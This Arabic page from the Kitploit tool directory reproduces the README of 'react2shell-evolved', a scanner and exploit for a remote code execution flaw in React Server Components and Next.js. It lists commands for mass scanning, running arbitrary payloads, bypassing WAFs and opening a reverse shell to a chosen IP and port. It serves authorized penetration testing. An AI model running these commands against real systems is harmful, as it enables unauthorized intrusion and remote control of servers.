Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
react2shell-evolved — نسخة متطورة من ماسح assetnote CVE-2025-55182 | Kitploit
أدوات/GitHubGitHub/guiimoraes/react2shell-evolved
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويبتجاوز WAFاختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubguiimoraes/react2shell-evolved

react2shell-evolved

نسخة متطورة من ماسح assetnote CVE-2025-55182

عرض المستودع
21منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

React2Shell Scanner

High Fidelity Detection for RSC/Next.js RCE

ماسح ضوئي لاكتشاف ثغرات تنفيذ الأوامر عن بُعد (RCE) في تطبيقات React Server Components و Next.js.

حول

ماسح React2Shell Scanner هو أداة متخصصة لتحديد ثغرات تنفيذ الأوامر عن بُعد (RCE) في التطبيقات التي تستخدم React Server Components (RSC) و Next.js. تكتشف الأداة الثغرات المتعلقة بـ CVEs التالية:

  • CVE-2025-55182
  • CVE-2025-66478

تقوم الأداة بإجراء فحوصات عالية الدقة باستخدام كشف القناة الجانبية (side-channel detection) وإثبات المفهوم لـ RCE، مع القدرة على استخراج النتائج الديناميكية للأوامر المنفذة من خلال التحليل التلقائي لاستجابات HTTP.

هذه نسخة معدلة بواسطة @imguimoraes من الماسح الأصلي الذي طورته فريق أبحاث أمان Assetnote. تم إنشاء PoC RCE الأصلي بواسطة @maple3142.

الميزات

  • كشف عالي الدقة باستخدام القناة الجانبية و PoC RCE
  • تنفيذ متعدد الخيوط للمسح الجماعي
  • استخراج ديناميكي لنتائج الأوامر المنفذة (تحليل تلقائي للهيدرات وجسم الاستجابة)
  • تجاوز WAF باستخدام بيانات عشوائية قابلة للتكوين
  • دعم لنظام Windows (PowerShell) و Linux/Unix (shell)
  • إخراج بتنسيق JSON منظم للتحليل اللاحق
  • تتبع تلقائي لإعادة التوجيه
  • واجهة بشريط تقدم وإخراج ملون

التثبيت

المتطلبات

  • Python 3.8 أو أعلى
  • pip (مدير حزم Python)

تثبيت التبعيات

root@kitploit:~
pip install requests tqdm

أو باستخدام ملف requirements.txt:

root@kitploit:~
pip install -r requirements.txt

الاستخدام

الصيغة الأساسية

root@kitploit:~
python scanner.py [-u URL | -l FILE] [خيارات]

فحص عنوان URL واحد

root@kitploit:~
python scanner.py -u https://example.com

فحص عناوين URL متعددة

root@kitploit:~
python scanner.py -l hosts.txt

خيارات سطر الأوامر

خيارات الإدخال (إلزامي اختيار واحد)

الخيارالوصف
-u, --url URLعنوان URL أو مضيف واحد للفحص
-l, --list FILEملف يحتوي على قائمة بالمضيفين (واحد في كل سطر)

خيارات التنفيذ

الخيارالوصف
-t, --threads Nعدد الخيوط المتزامنة (الافتراضي: 10)
--timeout SECONDSمهلة الطلبات بالثواني (الافتراضي: 10)
-k, --insecureتعطيل التحقق من شهادة SSL (مفعل افتراضيًا)

خيارات الإخراج

خيارات الهيدرات

الخيارالوصف
-H, --header "Key: Value"إضافة هيدر HTTP مخصص (يمكن استخدامه عدة مرات)

خيارات الاستغلال

أمثلة الاستخدام

مثال 1: فحص أساسي لمضيف واحد

root@kitploit:~
python scanner.py -u https://target.com

مثال 2: فحص جماعي بعدة خيوط

root@kitploit:~
python scanner.py -l targets.txt -t 50 --timeout 15

مثال 3: فحص مع إخراج بتنسيق JSON

root@kitploit:~
python scanner.py -l targets.txt -o results.json --all-results

مثال 4: فحص بهيدرات مخصصة

root@kitploit:~
python scanner.py -u https://target.com -H "Authorization: Bearer token" -H "User-Agent: CustomAgent"

مثال 5: فحص بحمولة مخصصة

root@kitploit:~
python scanner.py -u https://target.com --payload "whoami"

مثال 6: فحص مع تجاوز WAF

root@kitploit:~
python scanner.py -l targets.txt --waf-bypass --waf-bypass-size 256

مثال 7: فحص في بيئة Windows

root@kitploit:~
python scanner.py -u https://target.com --windows --payload "whoami"

مثال 8: فحص مع فحص آمن (غير توغلي)

root@kitploit:~
python scanner.py -l targets.txt --safe-check

مثال 9: فحص مفصّل كامل

root@kitploit:~
python scanner.py -l targets.txt -v --all-results -o full_scan.json

مثال 10: إنشاء reverse shell

root@kitploit:~
python scanner.py -u https://target.com --reverse-shell 192.168.1.100:4444

تنسيق الإخراج

الإخراج في الطرفية

يعرض الماسح النتائج برموز ألوان تشير إلى الحالة:

  • [VULNERABLE] - مضيف ثغرة (أحمر)
  • [NOT VULNERABLE] - مضيف غير ثغرة (أخضر)
  • [ERROR] - خطأ أثناء الفحص (أصفر)

بالنسبة للمضيفين الثغرات، يتم عرض نتيجة الأمر المنفذ عندما تكون متاحة من خلال الاستخراج التلقائي من هيدر X-Action-Redirect أو جسم الاستجابة.

تنسيق JSON

عند استخدام الخيار -o، يتم حفظ الإخراج بتنسيق JSON بالهيكل التالي:

root@kitploit:~
{
  "scan_time": "2025-01-XXT00:00:00.000000Z",
  "total_results": 10,
  "results": [
    {
      "host": "https://target.com",
      "vulnerable": true,
      "status_code": 307,
      "final_url": "https://target.com/",
      "command_result": "11111",
      "timestamp": "2025-01-XXT00:00:00.000000Z",
      "request": "POST / HTTP/1.1\r\n...",
      "response": "HTTP/1.1 307 Temporary Redirect\r\n...",
      "error": null
    }
  ]
}

حقول النتيجة:

  • vulnerable: true إذا كان ثغرة، false إذا لم يكن، null إذا حدث خطأ
  • command_result: نتيجة الأمر المنفذ المستخرجة من الاستجابة (عند التوفر)
  • final_url: عنوان URL النهائي الذي تم اختباره (بعد تتبع إعادة التوجيه إذا كان مفعلًا)
  • status_code: رمز HTTP للاستجابة
  • request: طلب HTTP الكامل المرسل
  • response: استجابة HTTP المستلمة (أول 2000 حرف)
  • error: رسالة الخطأ إن وجدت
  • timestamp: طابع زمني UTC للفحص

الميزات التقنية

طرق الكشف

يوفر الماسح طريقتين للكشف:

  1. الفحص الآمن (--safe-check): كشف القناة الجانبية غير التوغلي الذي يتحقق من أنماط الخطأ في الاستجابة دون تنفيذ كود. مفيد للفحص الأولي بدون تأثير.

  2. PoC RCE: تنفيذ فعلي للكود عن بُعد مع استخراج ديناميكي للنتائج. يستخدم حمولات تعتمد على Node.js child_process لتنفيذ أوامر النظام.

استخراج النتائج

يقوم الماسح بتحليل تلقائي لاستجابات HTTP لاستخراج نتائج الأوامر المنفذة:

  • استخراج من هيدر X-Action-Redirect (تنسيق: NEXT_REDIRECT;push;/login?a=<result>;307;)
  • استخراج من جسم الاستجابة (تنسيق: E{"digest":"<result>"} أو 1:E{"digest":"<result>"})
  • يعمل مع أي أمر/حمولة مخصصة عبر المعامل --payload

يتم الاستخراج ديناميكيًا، ولا يعتمد على قيم ثابتة، مما يسمح بالتحقق من تنفيذ أي أمر.

تجاوز WAF

عند استخدام الخيار --waf-bypass:

  • يضيف بيانات عشوائية (junk data) إلى بداية حمولة multipart/form-data
  • حجم قابل للتكوين عبر --waf-bypass-size (الافتراضي: 128 كيلوبايت)
  • مفيد لتجاوز مرشحات WAF التي تفحص محتوى جسم الطلب
  • يتم زيادة المهلة تلقائيًا إلى 20 ثانية عند تفعيل تجاوز WAF

الحمولات المخصصة

يسمح المعامل --payload بتحديد أي أمر للتنفيذ:

  • الافتراضي: echo $((41*271)) (النتيجة: 11111)
  • Windows: استخدم أوامر PowerShell عند تفعيل --windows
  • Linux/Unix: استخدم أوامر shell القياسية

يتم استخراج نتيجة الأمر وعرضها تلقائيًا، بغض النظر عن القيمة المرجعة.

Reverse Shell

يتيح الخيار --reverse-shell إنشاء اتصال reverse shell:

  • التنسيق: IP:PORT (مثال: 192.168.1.100:4444)
  • يستخدم وحدات Node.js net و child_process
  • لـ Windows: يشغل powershell.exe
  • لـ Linux/Unix: يشغل /bin/sh

إخلاء المسؤولية القانوني والأخلاقي

هذه الأداة مخصصة حصريًا للأغراض التعليمية واختبارات الأمان المصرح بها.

  • استخدم فقط على الأنظمة التي تمتلكها أو لديك إذن صريح ومكتوب لاختبارها
  • الاستخدام غير المصرح به لهذه الأداة غير قانوني وقد يؤدي إلى مسؤولية جنائية
  • لا يتحمل المطورون أي مسؤولية عن سوء استخدام هذه الأداة
  • احصل دائمًا على إذن كتابي قبل إجراء اختبارات الاختراق
  • التزم بالقوانين واللوائح المعمول بها في نطاق اختصاصك

الإشادات

الاستغلال الأصلي

تم إنشاء استغلال RCE الأصلي بواسطة @maple3142.

الماسح الأصلي

تم تطوير الماسح الأصلي بواسطة فريق أبحاث أمان Assetnote:

  • المستودع: https://github.com/assetnote/react2shell-scanner/
  • الموقع: https://www.assetnote.io/

هذه النسخة

تحتفظ هذه النسخة المعدلة بوظائف الماسح الأصلي مع تحسينات إضافية:

  • استخراج ديناميكي لنتائج الأوامر (تحليل تلقائي للاستجابات)
  • دعم الأوامر المخصصة مع استخراج النتائج
  • إزالة تجاوز Vercel (تم التصحيح في ؟؟/؟؟/2025)
  • نظام Reverse Shell (صديق للانهيار)

تم التحرير بواسطة: guiimoraes

CVEs ذات الصلة

  • CVE-2025-55182
  • CVE-2025-66478

إذا وجدت أخطاء أو لديك اقتراحات للتحسين، يرجى فتح issue في المستودع ووصف المشكلة بالتفصيل.

تنزيل الأداة
الخيارالوصف
-o, --output FILEملف الإخراج للنتائج بتنسيق JSON
--all-resultsحفظ جميع النتائج في الملف، وليس فقط الثغرات
-v, --verboseإخراج مفصل (عرض مقتطفات الاستجابة للتحليل)
-q, --quietالوضع الصامت (عرض المضيفين الثغرات فقط)
--no-colorتعطيل الإخراج الملون
الخيارالوصف
--safe-checkاستخدام كشف القناة الجانبية الآمن بدلاً من PoC RCE (لا ينفذ كود)
--windowsاستخدام حمولة PowerShell بدلاً من shell Unix (لبيئات Windows)
--waf-bypassإضافة بيانات عشوائية إلى الحمولة لتجاوز WAF (الافتراضي: 128 كيلوبايت)
--waf-bypass-size KBحجم البيانات العشوائية بالكيلوبايت لتجاوز WAF (الافتراضي: 128)
--payload COMMANDأمر مخصص للتنفيذ في RCE (الافتراضي: echo $((41*271)))
--reverse-shell IP:PORTإنشاء اتصال reverse shell إلى IP:PORT المحدد